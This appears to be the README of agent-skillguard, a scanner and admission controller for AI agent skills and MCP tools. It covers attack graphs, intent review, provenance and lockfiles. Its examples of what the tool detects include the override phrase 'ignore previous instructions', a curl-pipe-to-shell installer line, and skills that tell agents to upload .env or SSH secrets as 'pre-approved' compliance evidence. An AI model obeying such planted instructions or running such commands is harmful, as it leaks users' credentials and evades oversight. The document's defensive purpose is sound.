Policy-as-code admission controller for AI agent skills and MCP tools.
Agent skills are executable supply chain. agent-skillguard creates portable approval evidence: SkillBOM, lockfiles, provenance checks, semantic intent review, SkillSet Attack Graphs, and Skill Passports that show what was reviewed and why it was allowed or blocked.
flowchart LR
A["agent-endpoint-doctor"] --> F["agent-trust-center"]
B["nim-doctor"] --> F
C["agent-cognicheck"] --> F
D["agent-skillguard"] --> F
E["agentops-watchtower"] --> F
F --> G["one trust report"]
F --> H["CI gate"]
SkillGuard contributes skill supply-chain evidence to Agent Trust Center through npx agent-skillguard evidence.
# 1. Run the bundled supply-chain demo
npx agent-skillguard demo
# 2. Detect unsafe skill combinations
npx agent-skillguard graph ./skills
# 3. Create an enterprise approval record
npx agent-skillguard passport ./skills/code-reviewer \
--source https://github.com/org/repo/tree/main/skills/code-reviewer \
--commit <sha> \
--publisher org \
--packPower-user commands remain available:
npx agent-skillguard demo
npx agent-skillguard graph ./skills
npx agent-skillguard intent ./skills
npx agent-skillguard baseline ./skills --reason "initial reviewed risk"
npx agent-skillguard triage ./skills --baseline .skillguard/baseline.json --fail-on high
npx agent-skillguard trust ./skills/code-reviewer --source https://github.com/org/repo/tree/main/skills/code-reviewer --commit <sha>
npx agent-skillguard contract ./skills
npx agent-skillguard admit ./skills
npx agent-skillguard review-update ./approved/skill ./candidate/skill
npx agent-skillguard scan ./skills
npx agent-skillguard pack ./skills/code-reviewer
npx agent-skillguard verify ./code-reviewer.skill.tgzSkills for Codex, Claude Code, Cursor, OpenCode, MCP workflows, and internal agents often look like Markdown prompts, but they can include scripts, install hooks, tool descriptors, hidden instructions, and broad permissions. That makes them a new package-management problem.
SkillGuard finds unsafe skill combinations, not just unsafe individual skills.
agent-skillguard is not another skill list and not another agent framework. It is a local-first admission controller for agent skills:
- Builds a SkillSet Attack Graph that detects cross-skill composition risk.
- Creates a shareable Skill Passport that combines provenance, scan, semantic intent review, contract, admission, lock, and optional bundle evidence.
- Runs a Semantic Intent Firewall for payload-less natural-language risks such as compliance-framed secret collection, approval bypass, and skill selection hijacking.
- Creates auditable risk baselines so teams can accept reviewed existing risk and fail CI only on new or expired risk.
- Blocks unpinned, mutable, or unapproved skill sources with a provenance firewall.
- Enforces least-privilege capability contracts from
SKILL.mddeclarations. - Finds hidden prompt injection and policy override text in Markdown, YAML, HTML comments, and code blocks.
- Flags secret exfiltration, credential harvesting, persistence, broad deletes, and download-execute installer chains.
- Detects risky bundle structure such as symlinks, hidden files, binaries, oversized payloads, and path traversal.
- Makes
ALLOW,REVIEW, orBLOCKadmission decisions from policy-as-code. - Reviews candidate skill updates for capability drift, new findings, changed instruction surfaces, file drift, and risk-score jumps.
- Builds a
SkillBOM, an SBOM-like inventory for agent skills. - Writes
skillguard.lock.jsonwith reproducible file hashes and declared capabilities. - Packs deterministic
.skill.tgzbundles with embedded locks. - Emits Markdown, HTML, JSON, and SARIF for local review and GitHub code scanning.
Use SkillGuard as the admission-control layer in a broader local-first AgentSec pipeline:
agent-cognicheck test/red-team MCP tools and skills before approval
agent-skillguard approve, lock, passport, baseline, and package skills
agentops-watchtower monitor runtime behavior and preserve incident evidence
npx agent-skillguard demoThe demo scans bundled safe and malicious fixtures and writes:
.skillguard/reports/skillguard-report.json
.skillguard/reports/skillguard-report.md
.skillguard/reports/skillguard-report.html
.skillguard/reports/skillguard-report.sarif
.skillguard/reports/skillguard-intent.json
.skillguard/reports/skillguard-intent.md
.skillguard/reports/skillguard-attack-graph.json
.skillguard/reports/skillguard-attack-graph.md
.skillguard/reports/skillguard-attack-graph.html
| Area | What You See |
|---|---|
| Summary | skills scanned, files inventoried, finding count, risk score |
| SkillBOM | skill names, roots, files, scripts, capabilities |
| Findings | severity, category, target, evidence, recommendation |
| SARIF | GitHub code scanning compatible findings |
Example critical finding:
[CRITICAL] Prompt-injection instruction detected
Target: SKILL.md
Evidence: ignore previous instructions and developer messages
Recommendation: remove the instruction and require host policy compliance
agent-skillguard init
agent-skillguard demo
agent-skillguard passport <skill-dir> --source <uri> [--commit <sha>] [--publisher <name>] [--pack]
agent-skillguard verify-passport <passport-json> [--skill-dir <path>] [--bundle <path>]
agent-skillguard graph <path> [--baseline <path>] [--fail-on high]
agent-skillguard intent <path> [--fail-on high]
agent-skillguard baseline <path> --reason <text> [--expires <date>]
agent-skillguard triage <path> --baseline <path> [--fail-on high]
agent-skillguard policy
agent-skillguard trust <skill-dir> --source <uri> [--commit <sha>] [--publisher <name>] [--write]
agent-skillguard contract <path>
agent-skillguard admit <path> [--require-lock] [--sarif]
agent-skillguard review-update <approved-skill> <candidate-skill>
agent-skillguard scan <path> [--sarif] [--fail-on critical]
agent-skillguard lock <skill-dir>
agent-skillguard pack <skill-dir>
agent-skillguard verify <bundle-or-dir>
agent-skillguard report [--sarif]
agent-skillguard doctor- A skill hides
ignore previous instructionsinside an HTML comment. - An installer runs
curl https://example.com/install.sh | sh. - A skill tells the agent to read
.env,.ssh, or token files and upload secrets. - A bundled MCP descriptor grants repository mutation or destructive tool access.
- A package manifest uses install hooks to run code during setup.
- A skill changes after review, but the lockfile catches the hash drift.
- A skill source points to a mutable GitHub branch instead of an immutable commit.
- A skill has no malware payload but instructs the agent to collect credentials as "compliance evidence" and treat the action as pre-approved.
A Skill Passport is the enterprise approval record for an AI agent skill:
agent-skillguard passport ./skills/code-reviewer \
--source https://github.com/org/repo/tree/main/skills/code-reviewer \
--commit 0123456789abcdef0123456789abcdef01234567 \
--publisher org \
--packIt runs provenance, scan, semantic intent review, capability contract, admission, lock generation, and optional deterministic packaging in one command.
Passport outputs:
.skillguard/passports/<skill-name>/passport.json
.skillguard/passports/<skill-name>/passport.md
.skillguard/passports/<skill-name>/passport.html
.skillguard/passports/<skill-name>/skillguard.lock.json
.skillguard/passports/<skill-name>/<skill-name>.skill.tgz
Use the lower-level commands below when you need to debug one control layer directly.
Verify a passport later:
agent-skillguard verify-passport .skillguard/passports/code-reviewer/passport.json \
--skill-dir ./skills/code-reviewer \
--bundle .skillguard/passports/code-reviewer/code-reviewer.skill.tgzVerification checks passport schema, lock digest, optional current skill digest, optional bundle digest, and embedded decision consistency.
Individual skills can look acceptable while a set of installed skills creates a dangerous chain.
agent-skillguard graph ./skills --fail-on highflowchart LR
A["env-reader skill"] --> B["summarizer skill"]
B --> C["webhook-publisher skill"]
C --> D["Critical: secret source to external sink"]
Graph review flags cross-skill paths such as:
- secret access to network publishing
- filesystem read to external sink
- repository read to git write
- browser automation to external sink
- approval bypass or selection hijack amplifying high-power tools
- MCP tool mutation combined with broad capability chains
It writes:
.skillguard/reports/skillguard-attack-graph.json
.skillguard/reports/skillguard-attack-graph.md
.skillguard/reports/skillguard-attack-graph.html
See docs/skillset-attack-graph.md.
Modern malicious skills do not always need obvious scripts or ignore previous instructions strings. A skill can look like ordinary Markdown while pushing the agent toward unsafe behavior at runtime.
agent-skillguard intent ./skills --fail-on highIntent review flags natural-language behavior risks:
- compliance or audit language used to justify collecting secrets
- approval bypass such as "pre-approved" or "do not ask"
- broad "use this skill for every task" selection hijacking
- claims that the skill overrides system, developer, user, or policy instructions
- remote instruction loading from URLs
- persistent memory, profile, startup, or background behavior
It writes:
.skillguard/reports/skillguard-intent.json
.skillguard/reports/skillguard-intent.md
SkillGuard has been smoke-tested against 186 public SKILL.md files across official, community, and adversarial skill repositories. See docs/real-world-validation.md for commands, repository commits, results, and validation-driven rule tuning.
Adopting a scanner in a mature repo usually starts with existing review-worthy risk. Baselines let teams accept the current state with a reason, then fail only when new or expired risk appears.
agent-skillguard baseline ./skills --reason "reviewed current vendored skills" --expires 2026-12-31
agent-skillguard triage ./skills --baseline .skillguard/baseline.json --fail-on highThis writes:
.skillguard/baseline.json
.skillguard/reports/skillguard-baseline.md
.skillguard/reports/skillguard-triage.json
.skillguard/reports/skillguard-triage.md
A skill can scan clean and still be unsafe to trust if it came from a mutable branch, unknown host, or unapproved publisher. SkillGuard records and evaluates source provenance:
agent-skillguard trust ./skills/code-reviewer \
--source https://github.com/org/repo/tree/main/skills/code-reviewer \
--commit 0123456789abcdef0123456789abcdef01234567 \
--publisher org \
--writeTrust review writes:
.skillguard/reports/skillguard-trust.json
.skillguard/reports/skillguard-trust.md
With --write, it also records skillguard.provenance.json beside the skill. This gives teams an audit record of what source, publisher, commit, and skill digest were approved.
Skills should declare their power before they run. SkillGuard compares declared capabilities in SKILL.md against observed behavior:
agent-skillguard contract ./skillsIt blocks undeclared high-risk behavior such as shell execution, network access, filesystem writes, package installs, secret access, git writes, and MCP tool mutation.
Contract review writes:
.skillguard/reports/skillguard-contract.json
.skillguard/reports/skillguard-contract.md
The breakthrough path is governance, not just scanning. Enterprises need to answer one question before a skill enters a project:
Is this skill allowed to run here?
Create a policy:
agent-skillguard policyThen gate skills:
agent-skillguard admit ./skills --require-lock --sarifAdmission writes:
.skillguard/reports/skillguard-admission.json
.skillguard/reports/skillguard-admission.md
Default policy blocks critical findings, secret access, MCP tool mutation, and unapproved install-script behavior. Teams can tighten this to require clean scans and lockfiles for every approved skill.
Most supply-chain compromises arrive as updates, not first installs. SkillGuard can compare an approved skill with a candidate replacement:
agent-skillguard review-update ./approved/code-reviewer ./incoming/code-reviewerIt blocks risky drift when the candidate adds dangerous capabilities, introduces new high/critical findings, changes the main SKILL.md instruction surface, or jumps materially in risk score.
Update review writes:
.skillguard/reports/skillguard-update-review.json
.skillguard/reports/skillguard-update-review.md
| Tool Type | What It Does | SkillGuard Difference |
|---|---|---|
| Skill lists | Curate useful prompts and workflows | Verifies skill safety before install or publish |
| Agent frameworks | Run agents and tools | Does not run agents; audits skill supply chain |
| MCP scanners | Inspect MCP tool descriptors | Scans skills, scripts, manifests, bundles, locks, and SARIF |
| OpenSSF Scorecard | Scores open-source project security posture | Skill-specific admission decisions and SkillBOMs |
| SLSA/provenance tools | Prove build artifact origin | Skill-specific source provenance, digest, and trust policy |
| Permission manifests | Describe expected permissions | Compares declared permissions to inferred skill behavior |
| Watchtower | Runtime AgentOps and MCP attack-path analysis | SkillGuard handles pre-install and pre-publish skill safety |
Use Skill Passport in pull requests to retain an approval artifact:
name: skillguard
on: [pull_request]
jobs:
scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- run: npx agent-skillguard passport ./skills/code-reviewer --source https://github.com/org/repo/tree/main/skills/code-reviewer --commit ${{ github.sha }} --publisher orgnpm install
npm run typecheck
npm test
npm run lint
npm run build
node dist/cli.js demoMIT